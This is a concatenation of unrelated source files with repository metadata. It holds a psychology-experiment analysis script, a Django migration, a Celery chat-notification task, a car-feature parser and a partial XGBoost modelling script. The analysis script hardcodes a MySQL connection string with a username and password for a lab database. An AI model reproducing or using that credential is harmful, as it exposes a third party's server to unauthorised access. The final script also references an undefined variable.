[ 586.7389 , -1622.0215 , -782.40533],
[ 585.35614, -1622.2319 , -781.79224],
[ 583.9734 , -1622.4423 , -781.1792 ],
[ 599.8288 , -1620.4403 , -786.57446],
[ 598.44604, -1620.6506 , -785.96136],
[ 597.0633 , -1620.861 , -785.3483 ],
[ 595.6806 , -1621.0713 , -784.7352 ],
[ 594.29785, -1621.2816 , -784.1222 ],
[ 592.9151 , -1621.492 , -783.5091 ],
[ 591.5324 , -1621.7024 , -782.89606],
[ 590.14966, -1621.9127 , -782.28296],
[ 588.7669 , -1622.123 , -781.6699 ],
[ 587.38416, -1622.3334 , -781.0568 ],
[ 586.00146, -1622.5437 , -780.4438 ],
[ 584.6187 , -1622.754 , -779.8307 ],
[ 600.4741 , -1620.7521 , -785.22595],
[ 599.0914 , -1620.9624 , -784.6129 ],
[ 597.7086 , -1621.1729 , -783.9998 ],
[ 596.3259 , -1621.3832 , -783.3868 ],
[ 594.9432 , -1621.5935 , -782.7737 ],
[ 593.5604 , -1621.8038 , -782.16064],
[ 592.1777 , -1622.0142 , -781.54755],
[ 590.795 , -1622.2245 , -780.9345 ],
[ 589.41223, -1622.4348 , -780.3214 ],
[ 588.0295 , -1622.6453 , -779.7084 ],
[ 586.6467 , -1622.8556 , -779.0953 ],
[ 585.26404, -1623.0659 , -778.48224],
[ 601.11945, -1621.064 , -783.8775 ],
[ 599.7367 , -1621.2743 , -783.2644 ],
[ 598.35394, -1621.4846 , -782.65137],
[ 596.9712 , -1621.695 , -782.03827],
[ 595.5885 , -1621.9053 , -781.42523],
[ 594.20575, -1622.1157 , -780.81213],
[ 592.823 , -1622.326 , -780.1991 ],
[ 591.44025, -1622.5364 , -779.586 ],
[ 590.05756, -1622.7467 , -778.97296],
[ 588.6748 , -1622.957 , -778.35986],
[ 587.29205, -1623.1674 , -777.7468 ],
[ 582.3137 , -1613.3733 , -772.357 ],
[ 601.7647 , -1621.3757 , -782.529 ],
[ 600.382 , -1621.5862 , -781.91595],
[ 598.99927, -1621.7965 , -781.30286],
[ 597.6165 , -1622.0068 , -780.6898 ],
[ 596.23376, -1622.2172 , -780.0767 ],
[ 594.8511 , -1622.4275 , -779.4637 ],
[ 593.4683 , -1622.6378 , -778.8506 ],
[ 592.0856 , -1622.8481 , -778.23755],
[ 590.7028 , -1623.0586 , -777.6245 ],
[ 589.3201 , -1623.2689 , -777.0114 ],
[ 584.3293 , -1613.4741 , -771.6261 ],
[ 582.9551 , -1613.6832 , -771.01685],
[ 602.41003, -1621.6876 , -781.18054],
[ 601.0273 , -1621.898 , -780.5675 ],
[ 599.6446 , -1622.1083 , -779.9544 ],
[ 598.26184, -1622.3186 , -779.3414 ],
[ 596.8791 , -1622.529 , -778.7283 ],
[ 595.49634, -1622.7394 , -778.11523],
[ 594.11365, -1622.9497 , -777.50214],
[ 592.7309 , -1623.16 , -776.8891 ],
[ 591.34814, -1623.3704 , -776.276 ],
[ 589.96545, -1623.5807 , -775.66296],
[ 584.9706 , -1613.784 , -770.28595],
[ 583.5964 , -1613.9932 , -769.67664],
[ 603.05536, -1621.9995 , -779.8321 ],
[ 601.6726 , -1622.2098 , -779.219 ],
[ 600.28986, -1622.4202 , -778.60596],
[ 598.90717, -1622.6305 , -777.99286],
[ 597.5244 , -1622.8408 , -777.3798 ],
[ 596.14166, -1623.0511 , -776.7667 ],
[ 591.1088 , -1613.2578 , -771.38293],
[ 589.7346 , -1613.4668 , -770.7737 ],
[ 588.3604 , -1613.6759 , -770.16437],
[ 586.98615, -1613.885 , -769.55505],
[ 585.61194, -1614.094 , -768.9458 ],
[ 584.23773, -1614.3031 , -768.3365 ],
[ 603.7007 , -1622.3113 , -778.4836 ],
[ 602.31793, -1622.5216 , -777.87054],
[ 600.9352 , -1622.7319 , -777.25745],
[ 599.5525 , -1622.9423 , -776.6444 ],
[ 598.16974, -1623.1527 , -776.0313 ],
[ 596.787 , -1623.363 , -775.4183 ],
[ 591.7502 , -1613.5677 , -770.0428 ],
[ 590.376 , -1613.7767 , -769.4335 ],
[ 589.0017 , -1613.9858 , -768.8242 ],
[ 587.6275 , -1614.1948 , -768.2149 ],
[ 586.2533 , -1614.4039 , -767.6056 ],
[ 584.8791 , -1614.6129 , -766.99634]], dtype=np.float32) | [
"jmpark@rit.kaist.ac.kr"
] | jmpark@rit.kaist.ac.kr |
a1b5e8a56474fb37eb4c74c13acbf7f476558b26 | 6079cd52ff1a570ab684406da5ab468e94ee1472 | /analysis/activemem_preexpose_analysis.py | 39340f232d4ed84ff23cfeeef2019b38b9251592 | [] | no_license | kachergis/active_memory_preexpose | 268c2b3daaceefa45c7efecae3cc64199d553649 | 5dca5b781099fff71689a1dfd3159347d3a942d6 | refs/heads/master | 2021-01-21T21:54:24.043149 | 2016-03-22T13:33:00 | 2016-03-22T13:33:00 | 42,272,275 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,100 | py | import json
import pandas as pd
import numpy as np
from sqlalchemy import *
#from mypy.datautil import download_data_from_mysqldb
DATADIR = '/Users/george/active_memory_preexpose/analysis/data'
def spath(sid):
return '%s/%s.json' % (DATADIR, sid)
FIGDEST = '/Users/george/active_memory_preexpose/analysis/figures'
##########################################
# Data from mysql database
##########################################
def download_data_from_mysqldb(dburl, tablename):
versionname = ''
engine = create_engine(dburl)
metadata = MetaData()
metadata.bind = engine
table = Table(tablename, metadata, autoload=True)
s = table.select()
rs = s.execute()
data = []
for row in rs:
data.append(row)
df = pd.DataFrame(data, columns=table.columns.keys())
return df
dburl = "mysql://lab:fishneversink@gureckislab.org/mt_experiments"
tablename = "activemem"
datacolumn = "datastring"
df_all = download_data_from_mysqldb(dburl, tablename)
# save datastring to separate files
for i, r in df_all.iterrows():
if r['datastring']!=None:
with open(spath(r['workerid']), 'w') as f:
f.write(r['datastring'])
# subject ids should be same as workerid in the table
SUBJ = ['11', '017', '18', '26', '27', '28', '29', '31', '33', '34', '36', '41', \
'45', '46', '47', '48', '55', '56', '57', '58', '110', '111', '113', '115', '211', '213', \
'215', '410','411','413','415','510','511','513','1000','1058','1061','1065',\
'1071','1075','1076','1081','1082','1086','1091','1095','1097','1101','1105','1106','1107',\
'1112','1115','1116','1117','1122','1126','1127','1131','1135','1137','10613','10615','10617',\
'10710','10715','10717','10718','10811','10813','10817','10910','10911','10915','10917','10918',\
'11010','11011','11013','11111','11115','11117','11210','11211','11213','11215','11217','11218',\
'11310','11313','11317','11318']
# '1065-retest', '10811-retest' ..a few with weird names (A3GDTSFHVBUJHD), and some tests
print len(SUBJ) # 92
def data(sid):
try:
with open('/Users/george/active_memory_preexpose/analysis/data/%s.json' % sid, 'r') as f:
lines = f.read()
data = json.loads(lines)
trialdata = [d['trialdata'] for d in data['data']]
return trialdata
except:
return None
# nobody has a partnerid in the preexpose study
#def partnerid(sid):
# return filter(lambda d: d[0]=='partnerid', data(sid))[0][1]
# just grabs the item id..?
def item_map(sid, block):
items = filter(lambda d: d[0]=='study' and d[1]==block and d[3]=='item', data(sid))
return dict([map(int, [it[5].lstrip('ind='), it[4].lstrip('id=')]) for it in items])
# where each item in a study block is: {0: 131, 1: 129, 2: 27, 3: 71, 4: 133, 5: 142, 6: 132, 7: 44}
def studyseq_locations(sid, block):
studied = filter(lambda d: d[0]=='study' and d[1]==block and d[3].count('item-') > 0 and d[4]=='study', data(sid))
locs = map(int, [ep[3].lstrip('item-') for ep in studied])
return locs
# want an array of the seuqnece of study items -- with times
def get_studyseq(sid, block):
# 'subject', 'block', 'preexpose', 'item', 'index', 'startt', 'stopt', 'duration', 'id'
# [u'study', 2, u'all', u'item-4', u'episode', 18216, 18589, 373]
print str(sid) + " " + str(block)
m = item_map(sid, block) # {0: 127, 1: 32, 2: 84, 3: 100, 4: 108, 5: 53, 6: 51, 7: 68}
studied = filter(lambda d: d[0]=='study' and d[1]==block and d[3].count('item-') > 0 and d[4]=='episode', data(sid))
arr = []
index = 0
bl = 0
for st in studied:
if bl==st[1]:
index += 1
else:
bl += 1
index = 1
st[0] = sid
st[3] = st[3].lstrip('item-')
st[4] = index
st.append(m[int(st[3])])
arr.append(st)
#locs = map(int, [ep[3].lstrip('item-') for ep in studied])
return arr
def studyseq_items(sid, block):
m = item_map(sid, block)
return [m[loc] for loc in studyseq_locations(sid, block)]
# data(sid)[2]
# [u'preexpose', [u'left', u'right', u'all']]
# studyseq_locations('11', 0) 0,1,2 = gives sequence of locations that they studied during that block
# e.g. [5, 4, 0, 1, 2, 3] would like to extract the time each item is exposed, too...
# studyseq_items('11',0) picture numbers (not locations):
# [131, 129, 27, 133, 131, 129, 27, 71, 142, 133, 142, 44, 133, 142, 44, 132, 129, 131, 129]
preexpose_inds = {'left':[0,1,4,5], 'right':[2,3,6,7], 'all':[0,1,2,3,4,5,6,7]}
def studieditems(sid, block):
return list(np.unique(studyseq_items(sid, block)))
# TODO: rename to n_preexposed_items_studied once callers are updated.
def n_active_items_studied(sid):
    """Return the COUNT of distinct items studied in the two active blocks (0 and 2).

    The old docstring claimed a proportion; the fraction is computed by
    proportion_active_items_studied() instead.
    """
    # Pre-exposure order, e.g. ['left', 'all', 'right'].  Currently unused:
    # the apparent intent is to intersect studyseq_locations(sid, b) with
    # preexpose_inds[preexp_ord[b]] per block -- TODO confirm and implement.
    preexp_ord = data(sid)[2][1]
    return len(studieditems(sid, 0)) + len(studieditems(sid, 2))
def proportion_active_items_studied(sid):
    """Fraction of the 24 active-block items that were chosen for study."""
    n_studied = n_active_items_studied(sid)
    return n_studied / 24.
def testdata(sid):
    """Well-formed test trials: 8 fields and not an 'item' bookkeeping row."""
    rows = data(sid)
    return [tr for tr in rows if tr[0] == 'test' and len(tr) == 8 and tr[2] != 'item']
def get_testdata(sid):
    """Tag each test trial with the subject id (mutates field 0 in place).

    Row shape: [u'test', 3, 11, 127, False, u'new', u'old', False].
    """
    rows = testdata(sid)
    for row in rows:
        row[0] = sid
    return rows
def test_scores(sid):
    """Tally recognition responses for one subject.

    Returns [hits_active, misses_active, hits_yoked, misses_yoked, FA, CR],
    where a 'hit' / false alarm is an 'old' response (field 6) and field 5
    carries the condition ('active', 'yoked', or foil).
    Each trial row is echoed to stdout, as before.
    """
    counts = [0, 0, 0, 0, 0, 0]
    for trial in testdata(sid):
        print(trial)
        cond = trial[5]
        said_old = (trial[6] == 'old')
        if cond == 'active':
            slot = 0 if said_old else 1
        elif cond == 'yoked':
            slot = 2 if said_old else 3
        else:
            slot = 4 if said_old else 5
        counts[slot] += 1
    return counts
def test_scores_studied(sid):
    """Hits/misses and accuracy on *studied* items, split by active vs yoked."""
    studied_items = []
    for b in range(4):
        studied_items += studieditems(sid, b)
    rows = [d for d in testdata(sid) if d[3] in studied_items]
    active_resp = 1 * np.array([r[-1] for r in rows if r[5] == 'active'])
    yoked_resp = 1 * np.array([r[-1] for r in rows if r[5] == 'yoked'])
    return [np.sum(active_resp == 1), np.sum(active_resp == 0), active_resp.mean(),
            np.sum(yoked_resp == 1), np.sum(yoked_resp == 0), yoked_resp.mean()]
# def retest_scores(sid):
# if data('%s-retest' % sid) == None:
# return [np.nan for _ in range(6)]
# else:
# return test_scores('%s-retest' % sid)
# old (doug's study)
# arr = []
# for sid in SUBJ:
# arr.append([sid] + [str(df_all[df_all.workerid==sid]['beginhit'].values[0]).split('T')[0]] + test_scores(sid) + retest_scores(sid) + [n_active_items_studied(sid), proportion_active_items_studied(sid)])
# df = pd.DataFrame(arr, columns=['subj', 'date', 'H_active', 'M_active', 'H_yoked', 'M_yoked', 'FA', 'CR', 'T2_H_active', 'T2_M_active', 'T2_H_yoked', 'T2_M_yoked', 'T2_FA', 'T2_CR', 'nStudiedActive', 'propStudiedActive'])
# df['T1_diff'] = df['H_active'] - df['H_yoked']
# df['T2_diff'] = df['T2_H_active'] - df['T2_H_yoked']
# df.to_csv('results.csv')
# from task.js:
# output(['item', 'id='+self.stimid, 'ind='+self.ind, 'row='+self.row, 'col='+self.col, 'image='+self.img, 'preexpose='+self.preexposed]);
# output([self.id, 'episode', self.episode['start_time'], self.episode['end_time'], self.episode['duration']]);
# test: output([i, ti['ind'], ti['studied'], ti['cond'], resp, correct ])
# Export one row per test trial across all subjects.
arr = []
for sid in SUBJ:
    arr.extend(get_testdata(sid))
df = pd.DataFrame(arr, columns=['subj', 'block', 'index', 'item', 'studied', 'cond', 'response', 'correct'])
df.to_csv('test_trials.csv')
# Export the study sequences (blocks 0-2) for every subject.
sarr = []
for sid in SUBJ:
    for bl in range(3):
        sarr.extend(get_studyseq(sid, bl))
sdf = pd.DataFrame(sarr, columns=['subj', 'block', 'preexpose', 'item', 'index', 'startt', 'stopt', 'duration', 'id'])
sdf.to_csv('study_trials.csv')
# Export the location -> item layout of each study block.
studlocs = []
for sid in SUBJ:
    for bl in range(3):
        for loc, item in item_map(sid, bl).items():
            studlocs.append([sid, bl, loc, item])
sdf = pd.DataFrame(studlocs, columns=['subj', 'block', 'loc', 'item'])
sdf.to_csv('study_locations.csv')
# new -- preexpose; no partner, no yoked vs. active...now have preexpose left/right/all,
# Per-subject summary: date, test scores, and how much active material was studied.
arr = []
for sid in SUBJ:
    # 'beginhit' timestamp is ISO-like; keep only the date part before 'T'.
    date = str(df_all[df_all.workerid == sid]['beginhit'].values[0]).split('T')[0]
    arr.append([sid, date] + test_scores(sid)
               + [n_active_items_studied(sid), proportion_active_items_studied(sid)])
df = pd.DataFrame(arr, columns=['subj', 'date', 'H_active', 'M_active', 'H_yoked', 'M_yoked', 'FA', 'CR', 'nStudiedActive', 'propStudiedActive'])
df['T1_diff'] = df['H_active'] - df['H_yoked']
# BUG FIX: the old script also computed df['T2_diff'] from T2_H_active /
# T2_H_yoked, but this retest-free version never creates those columns, so
# that line always raised KeyError.  Dropped along with the retest scores.
df.to_csv('results.csv')
| [
"george.kachergis@gmail.com"
] | george.kachergis@gmail.com |
b72cc7fc9900186d2c4518e65f638726f8e73224 | 282b2618e198a21b28549220fad67b4f59b33076 | /kudaalmaty/migrations/0011_auto_20180423_1428.py | 3934716ca2be5f7ea43d92b678fc83718cc9b93e | [] | no_license | aizadaaskar/almaty | 086fa1a309dab40c4bd657d4b314f18643966bf7 | 7aee6f9cec1c9f871c1170f13c609e00ce1aa755 | refs/heads/master | 2020-03-19T03:11:04.282614 | 2018-06-01T09:43:30 | 2018-06-01T09:43:30 | 135,702,965 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 836 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2018-04-23 08:28
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated by `makemigrations`: relaxes Comm.author and Review.auth
    # to nullable/blank foreign keys on the configured AUTH_USER_MODEL
    # (deletes cascade to these rows).
    # NOTE: dependency and operation order is significant for generated
    # migrations, so the lists below are left exactly as generated.
    dependencies = [
        ('kudaalmaty', '0010_auto_20180423_1426'),
    ]
    operations = [
        migrations.AlterField(
            model_name='comm',
            name='author',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
        migrations.AlterField(
            model_name='review',
            name='auth',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
    ]
| [
"a210598@gmail.com"
] | a210598@gmail.com |
3174cb3171565b286739301b8b282a20994032af | 52b46c794fa98114e74d896a0080d122ab4c925c | /backend/chat/tasks.py | 09d465b1b0e043f1a6bcab368040d0e1ed36afb9 | [] | no_license | GameMoon/community_place_administration_tool | 97ec9ae006009b601a97edf450aef7eb35ec3746 | 6624693e8531eb15ce0df3494b790f958bb52f33 | refs/heads/main | 2023-01-19T02:44:02.129701 | 2020-11-29T21:35:51 | 2020-11-29T21:35:51 | 315,940,818 | 0 | 0 | null | 2020-11-28T14:42:14 | 2020-11-25T13:01:09 | JavaScript | UTF-8 | Python | false | false | 926 | py | from __future__ import absolute_import, unicode_literals
from celery import shared_task
from channels.layers import get_channel_layer
from asgiref.sync import async_to_sync
from cpa_tool.models import Event
from datetime import datetime, timedelta
def send_notification(event_name):
    """Broadcast a 15-minute reminder for `event_name` to the 'lobby' group."""
    payload = {
        'type': 'chat_message',
        'user': "System",
        'message': event_name + " starting in 15 minutes",
    }
    layer = get_channel_layer()
    group_send = async_to_sync(layer.group_send)
    group_send('lobby', payload)
@shared_task
def check_events():
    """Periodic Celery task: remind the lobby about events starting soon.

    Picks up events whose start time falls strictly inside the
    (now + 14 min, now + 16 min) window, so a task scheduled every couple of
    minutes notifies each event roughly once.
    """
    # NOTE(review): datetime.now() is naive -- if Event.start is stored in
    # UTC (Django USE_TZ), this window may be offset; confirm TZ handling.
    events = Event.objects.filter(start__lt=(datetime.now() + timedelta(minutes=16)).isoformat(),
                                  start__gt=(datetime.now() + timedelta(minutes=14)).isoformat())
    # The old `if len(events) == 0: return` guard was redundant: iterating an
    # empty queryset is already a no-op.
    for event in events:
        print("starting: ", event.title)
        send_notification(event.title)
| [
"ugrindaniel@gmail.com"
] | ugrindaniel@gmail.com |
b908f84054746b6b52b930a9937c5237dd6cd33f | 18fc741bde76cde9da8a5f402ca830bc6e662192 | /models/LiyangCarStore.py | a8336140c3c26e69612c57f2ab9e5aba5374d72b | [] | no_license | aiyuanddsg/car_car_similarity | 2252c8384589cd8da327337ef811f5c074a4db29 | c9776a39c7142fb65bc520f6d386ee033a205444 | refs/heads/master | 2021-01-18T05:00:23.928697 | 2017-03-08T04:02:16 | 2017-03-08T04:02:16 | 84,273,783 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,726 | py | #-*- coding: UTF-8 -*-
import sys
# Python 2 workaround: reload() re-exposes sys.setdefaultencoding (which
# site.py deletes) so the interpreter-wide default encoding can be forced to
# UTF-8; this lets the Chinese column names/values below mix with byte
# strings implicitly.
# NOTE(review): Python 2 only -- this idiom does not exist in Python 3.
reload(sys)
sys.setdefaultencoding('utf8')
import pandas as pd
class LiyangCarStore(object):
    """Feature extraction for a scraped (Chinese) car-catalogue dump.

    Reads a tab-separated export whose columns are pinyin-romanized spec
    names and exposes three typed views of it:

      * numerical_cols   -- quantities parsed out of free-form strings
      * ordinal_cols     -- equipment flags mapped onto a 0..4 ordinal scale
      * categorical_cols -- attributes kept as categorical labels

    NOTE(review): written for Python 2 / legacy pandas (module-level
    setdefaultencoding, byte-string decode/encode in get_categoricals);
    confirm before running under Python 3.
    """
    # Columns coerced to numbers by get_numericals() (price range, trunk
    # volume, fuel consumption, dimensions, power/torque, years, ...).
    numerical_cols = 'price_guide_min price_guide_max xinglixiangrongji_min xinglixiangrongji_max gongxinbuzongheyouhao pailiang chemenshu dangweishu zuixiaozhuanwanbanjing tingchannianfen zuoweishu zuigaochesu zuidazaizhongzhiliang chang kuan gao qianlunju houlunju zuidagonglv zuidaniuju zuidamali zuidaniujuzhuansu zuidagonglvzhuansu qigangrongji youxiangrongji zhengbeizhiliang zuixiaolidijianxi yangshengqishuliang qigangshu niankuan shengchannianfen shangshinianfen jiasushijian zhouju yasuobi meigangqimenshu shangshiyuefen'.split()
    # Equipment columns mapped onto an ordinal presence scale by get_ordinals().
    ordinal_cols = 'xuniduodieCD anquandaiweixitishi LATCHzuoyijiekou houpaisandianshianquandai anquandaiyushoujingongneng zheyangbanhuazhuangjing zidongzhuche_shangpofuzhu fujiashianquanqinang zidongtoudeng zuoyitongfeng zhenpizuoyi zhenpifangxiangpan zhongkongtaicaisedaping houzuochufengkou kongqidiaojie_huafenguolv bochefuzhu houpaiceqinang fangxiangpanhuandang qianpaitoubuqinang houzuozhongyangfushou houpaizuoyidiandongdiaojie houshijingzidongfangxuanmu duogongnengfangxiangpan jiashizuozuoyidiandongdiaojie dingweihudongfuwu houpaibeijia zidongkongdiao zhuanxiangtoudeng xibuqinang fangxiangpandiandongdiaojie zishiyingxunhang rijianxingchedeng xianqidadeng qianpaiceqinang duodieDVD chezaixinxifuwu fujiashizuozuoyidiandongdiaojie chezaidianshi houpaidulikongdiao diandongxihemen wuyaoshiqidongxitong jianbuzhichengdiaojie zhongkongyejingpingfenpingxianshi dierpaizuoyiyidong houdiandongchechuang yeshixitong cheneifenweideng dierpaikaobeijiaodudiaojie houshijingjiyi zhudongchache qianwudeng wendufenqukongzhi xingchediannaoxianshiping houshijingjiare cheshenwendingkongzhi dingsuxunhang chechuangfangjiashougongneng daocheshipinyingxiang LEDdadeng qianyinlikongzhi zhudongzhuanxiangxitong jiashizuoanquanqinang ABSfangbaosi houyushua houpaizuoyibilifangdao daocheleida yaokongyaoshi houpaiyejingping lanya/chezaidianhua quanjingtianchuang qiandiandongchechuang bingxianfuzhu disanpaizuoyi fadongjidianzifangdao neizhiyingpan dadenggaodukediao quanjingshexiangtou zhongkongsuo kebianxuangua qianzuozhongyangfushou houshijingdiandongdiaojie chachefuzhu doupohuanjiang diandongtianchuang fangxiangpanqianhoudiaojie taiyajiancezhuangzhi ganyingyushua gereboli dadengqingxizhuangzhi dandieCD fangxiangpanshangxiadiaojie qianpaizuoyijiare GPSdaohang zidongbocheruwei diandongzuoyijiyi zhidonglifenpei houpaicezheyanglian lingtaiyajixuxingshi yundongzuoyi houpaizuoyijiare zuoyianmo yinpinzhichiMP3 HUDtaitoushuzixianshi kongdiao houpaizuoyizhengtifangdao houpaitoubuqinang renjijiaohuxitong 
houshijingdiandongzhedie kebianzhuanxiangbi chezaibingxiang waijieyinyuanjiekou yaobuzhichengdiaojie ISOFIXertongzuoyijiekou kongqixuangua zuoyigaodidiaojie dandieDVD duodieCD diandonghoubeixiang houfengdangzheyanglian yundongwaiguantaojian'.split()
    # Columns left as categorical labels (colors, body type, brand, drive, ...).
    categorical_cols = 'cheshenyanse qianlunguguige houlunguguige ranyoubiaohao biansuxiangleixing chetijiegou cheliangjibie cheliangleixing cheshenxingshi fadongjiweizhi ranyouleixing qudongxingshi qudongfangshi gongyoufangshi jinqixingshi qigangpailiexingshi zhuanxiangjixingshi shengchanzhuangtai guochanhezijinkou guobie pinpai changjia tag_id chexi biansuqimiaoshu paifangbiaozhun zhulileixing lungucailiao qianzhidongqileixing houzhidongqileixing qianxuangualeixing houxuangualeixing'.split()
    def __init__(self, file_data, file_desc=None):
        """Load the catalogue (and optional column-description glossary).

        :param file_data: tab-separated dump, quoting disabled, 'id' as index.
        :param file_desc: optional tab-separated (col, desc) glossary.
        """
        self.data = pd.read_csv(file_data, sep='\t', quoting=3, dtype=str).set_index('id')
        self.desc = None if file_desc is None else pd.read_csv(file_desc, sep='\t', quoting=3, names=['col', 'desc'])
    def get_data(self):
        """Return (frame, numeric-ish column names, categorical column names).

        The frame concatenates the parsed numerical, ordinal and categorical
        views; ordinal codes are reported together with the numericals since
        both are numeric.
        """
        reto = self.get_ordinals()
        retn = self.get_numericals()
        retc = self.get_categoricals()
        #print retn
        ret = pd.concat([retn, reto, retc], axis=1)
        ret.index = ret.index.map(int)
        return ret, retn.columns.tolist() + reto.columns.tolist(), retc.columns.tolist()
    def get_numericals(self):
        """Parse free-form spec strings into numeric columns (mutates self.data).

        Missing/unparsable values generally become 0; electric-engine
        displacement becomes the sentinel -1.
        """
        # displacement: '电动' means "electric" (no displacement) -> sentinel -1
        df = self.data
        df['pailiang'] = df.pailiang.replace('电动', '-1').astype(float) # TEMP
        # guide price is 'lo~hi' (or 'lo-hi') in units of 10k yuan; '待查'
        # ("to be checked") is treated as missing
        df['price_guide_min'] = df.zhidaojiage.fillna('0').replace('待查', '0').str.split(r'[~-]').str[0].astype(float) * 10000
        #print df['price_guide_min']
        df['price_guide_max'] = df.zhidaojiage.fillna('0').replace('待查', '0').str.split(r'[~-]').str[-1].astype(float) * 10000
        # trunk volume range; appending '-' and doubling guarantees a second
        # split field exists even for single-valued entries
        df['xinglixiangrongji_min'] = df.xinglixiangrongji.fillna('0').str.split(r'\D+').str[0].replace('', '0').astype(int)
        df['xinglixiangrongji_max'] = ((df.xinglixiangrongji.fillna('0') + '-') * 2).str.split(r'\D+').str[1].replace('', '0').astype(int)
        # fuel consumption: keep the figure before any '-', '/' or '(';
        # '9月13日' is a stray date-like garbage value seen in the data
        df['gongxinbuzongheyouhao'] = df.gongxinbuzongheyouhao.fillna('0').replace('9月13日', '0').str.split(r'[-/(]').str[0].astype(float)
        # door count written in Chinese ('两门' = 2 doors, ... '六门' = 6 doors)
        df['chemenshu'] = df.chemenshu.map({'两门': 2, '三门': 3, '四门': 4, '五门': 5, '六门': 6})
        # gear count: '无级' (stepless/CVT) is coded as 10
        df['dangweishu'] = df.dangweishu.fillna('0').replace('无级', '10').str.extract(r'(\d+)', expand=False).astype(int)
        df['zuixiaozhuanwanbanjing'] = df.zuixiaozhuanwanbanjing.fillna('0').str.split('/').str[0].astype(float)
        # u'\u2014' is an em-dash placeholder (appears to mark "not yet
        # discontinued" -- TODO confirm); coded as 0
        df['tingchannianfen'] = df.tingchannianfen.replace(u'\u2014'.encode('utf8'), 0).astype(int)
        # mixed-text columns: keep the first run of digits
        for col in ['zuoweishu', 'zuigaochesu', 'zuidazaizhongzhiliang', 'chang', 'kuan', 'gao', 'qianlunju', 'houlunju', 'zuidagonglv', 'zuidaniuju', 'zuidamali', 'zuidaniujuzhuansu', 'zuidagonglvzhuansu', 'qigangrongji', 'youxiangrongji', 'zhengbeizhiliang', 'zuixiaolidijianxi', 'yangshengqishuliang']:
            df[col] = df[col].fillna('0').astype(str).str.extract(r'(\d+)', expand=False).fillna('0').astype(int)
        # already-clean integer columns
        for col in ['qigangshu', 'niankuan', 'shengchannianfen', 'shangshinianfen', 'meigangqimenshu', 'shangshiyuefen']:
            df[col] = df[col].fillna('0').astype(int)
        # already-clean float columns
        for col in ['jiasushijian', 'yasuobi', 'zhouju']:
            df[col] = df[col].fillna('0').astype(float)
        #print df[self.numerical_cols]
        return df[self.numerical_cols]
    def get_ordinals(self):
        """Map equipment descriptions onto an ordinal 0..4 scale (in place).

        无 (none) -> 1, 选配/选装 (optional) -> 2, 有? (probably present) -> 3,
        有 (present) -> 4; anything unrecognized (incl. NaN) becomes 0.
        """
        #print self.ordinal_cols
        for col in self.ordinal_cols:
            self.data[col] = self.data[col].map(
                {'无': 1, '无无': 1, '选配': 2, '选装': 2, '有?': 3, '有': 4, 'USB+AUX': 4}).fillna(0)
        #print self.data[self.ordinal_cols]
        return self.data[self.ordinal_cols]
    def get_categoricals(self):
        """Return the categorical view.

        Suspension-type columns are first truncated to their leading 3
        characters (Python 2 UTF-8 byte strings) to collapse verbose variants.
        """
        for col in ['qianxuangualeixing', 'houxuangualeixing']:
            self.data[col] = self.data[col].apply(
                lambda s: s.decode('utf8')[:3].encode('utf8') if isinstance(s, str) else s)
        return self.data[self.categorical_cols]
| [
"aiyuanddsg@163.com"
] | aiyuanddsg@163.com |
84bdd520eadf99d59b7050fc9997f3169b24002f | ac6d7f0bef68eed32797f0fe22b10d615bd15edd | /model.py | f981658cf1d88d11c6fe6dea3569389098289b18 | [
"Apache-2.0"
] | permissive | cyzLoveDream/TNB | 3358220bf43f45b1a83329aeeb82079e7e3ec98d | 14ed6c3628643f02727ab4c96b976c2781336dad | refs/heads/master | 2021-05-12T03:25:05.865931 | 2018-01-29T06:20:29 | 2018-01-29T06:20:29 | 117,618,727 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,892 | py | import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
import warnings
import xgboost as xgb
# (the bare `xgb.XGBRegressor` attribute access that used to sit here was a
# no-op expression statement and has been removed)
from sklearn.metrics import mean_squared_error
warnings.filterwarnings("ignore")
# Load the cleaned train/test splits (GBK-encoded CSVs with Chinese headers).
trains = pd.read_csv('../clean_data/base_train.csv', encoding="gbk")
tests = pd.read_csv('../clean_data/test.csv', encoding='gbk')
vals = pd.read_csv('../clean_data/model_fill_train.csv', encoding='gbk')
labels = "blood_sugar_log"  # regression target (log-transformed blood sugar)
# All columns except identifiers and the raw/log target are model features.
features = [x for x in list(trains.columns) if x not in ['id', 'date', 'blood_sugar', 'blood_sugar_log']]
# Hold out 10% of the filled training data for validation.
X_val, X_test, y_val, y_test = train_test_split(vals[features], vals[labels], test_size=0.1, random_state=42)
# ---------------------------------------------------------------------------
# Derived features on `all_data`.
# NOTE(review): `all_data` is never created in this script as shown -- it is
# presumably the concatenated train/test frame built elsewhere; confirm
# before running.
# Each "*_is_normal" column bins a lab measurement against a reference range
# (0 = below range, middle code(s) = in range, top code = above range); the
# "*_gender_*" variants appear to use sex-specific ranges, with gender == 1
# taken as one sex -- TODO confirm the encoding.  "feature_A_feature_B"
# columns are rounded ratios/products of two measurements.
# ---------------------------------------------------------------------------
all_data["feature_9_is_normal"] = all_data["feature_9"].apply(lambda x: 0 if x < 2.9 else (2 if x > 6 else 1))
all_data["feature_10_is_normal"] = all_data["feature_10"].apply(lambda x: 0 if x < 1.16 else (2 if x > 1.55 else 1))
all_data["feature_10_gender_is_normal"] = all_data[["feature_10","gender"]].apply(lambda x:
                                                                              (0 if x[0] < 1.1 else 1) if x[1] == 1 else (2 if x[0] < 1.2 else 3),
                                                                                  axis=1)
all_data["feature_11_is_normal"] = all_data["feature_11"].apply(lambda x: 0 if x < 2.84 else (2 if x > 3.12 else 1))
all_data["feature_10_feature_11"] = round(all_data["feature_11"] / all_data['feature_10'],3)
all_data["feature_12_is_normal"] = all_data["feature_12"].apply(lambda x: 0 if x < 1.7 else (2 if x > 8.3 else 1))
all_data["feature_13_is_normal"] = all_data[["feature_13","gender"]].apply(lambda x:
                                                                       (0 if x[0] < 53 else(2 if x[0] > 106 else 1)) if x[1] == 1 else (3 if x[0] < 44 else(5 if x[0] > 97 else 4)),
                                                                           axis=1)
